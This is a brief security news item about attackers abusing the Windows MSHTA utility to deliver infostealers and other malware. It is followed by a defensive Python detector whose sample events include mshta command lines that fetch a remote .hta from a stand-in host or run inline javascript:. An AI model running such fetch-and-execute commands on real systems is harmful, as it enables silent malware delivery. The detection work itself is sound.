Legacy Windows Tool MSHTA Fuels Surge in Silent Malware Attacks

MSHTA, a long-standing Windows component, is increasingly being abused by threat actors as a living-off-the-land binary (LOLBIN) to quietly deliver malware through social engineering and remote script execution. Bitdefender observed campaigns using MSHTA to spread Lumma, Amatera, ClipBanker, Emmenhtal, and PurpleFox, showing that the trust placed in legacy signed binaries remains highly effective for attackers.

Key points

  • MSHTA is a Microsoft-signed Windows utility that can execute HTA files and remote script content.
  • Threat actors are abusing MSHTA as a LOLBIN to deliver malware without raising suspicion.
  • Bitdefender saw a sharp rise in MSHTA-related activity since the start of the year.
  • Campaigns using MSHTA have delivered Lumma, Amatera, ClipBanker, Emmenhtal, and PurpleFox.
  • User awareness and blocking legacy binaries like MSHTA are key defenses against these attacks.
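The remote-script and inline-handler patterns described in the key points above are what a process-creation detection looks for. The following is an added example, not code from Bitdefender or SecurityWeek, that scores constructed Sysmon-style events (fields image, parent, cmdline are assumed) and uses an assumed, tunable list of parent processes that rarely have a legitimate reason to launch mshta.exe.

```python
"""Flag mshta.exe process-creation events that match the abuse patterns above."""
import re
from pathlib import PureWindowsPath

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
# Assumed list of parents that should rarely spawn mshta.exe; tune per environment.
RISKY_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe",
                 "msedge.exe", "powershell.exe", "cmd.exe"}


def basename(path):
    """Lower-cased file name of a Windows path, e.g. '...\\WINWORD.EXE' -> 'winword.exe'."""
    return PureWindowsPath(path).name.lower()


def mshta_findings(event):
    """Return the reasons an event looks like MSHTA abuse (empty list = nothing to flag)."""
    if basename(event["image"]) != "mshta.exe":
        return []
    reasons = []
    cmd = event["cmdline"]
    if REMOTE_URL.search(cmd):
        reasons.append("remote script URL on command line")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline javascript:/vbscript: protocol handler")
    parent = basename(event["parent"])
    if parent in RISKY_PARENTS:
        reasons.append(f"spawned by {parent}")
    return reasons


def scan(events):
    """Return (event id, reasons) for every event that produced at least one finding."""
    flagged = []
    for e in events:
        reasons = mshta_findings(e)
        if reasons:
            flagged.append((e["id"], reasons))
    return flagged


# Constructed sample events, not real telemetry; .invalid is a reserved test domain.
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "mshta.exe https://cdn.example.invalid/update.hta"},
    {"id": "e2", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"id": "e3", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta.exe javascript:window.close()"},
    {"id": "e4", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

Event e2 (a local .hta launched from Explorer) produces no finding, which is the baseline the tunable parent list and URL checks are meant to preserve while still catching e1 and e3.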

Read More: https://www.securityweek.com/legacy-windows-tool-mshta-fuels-surge-in-silent-malware-attacks/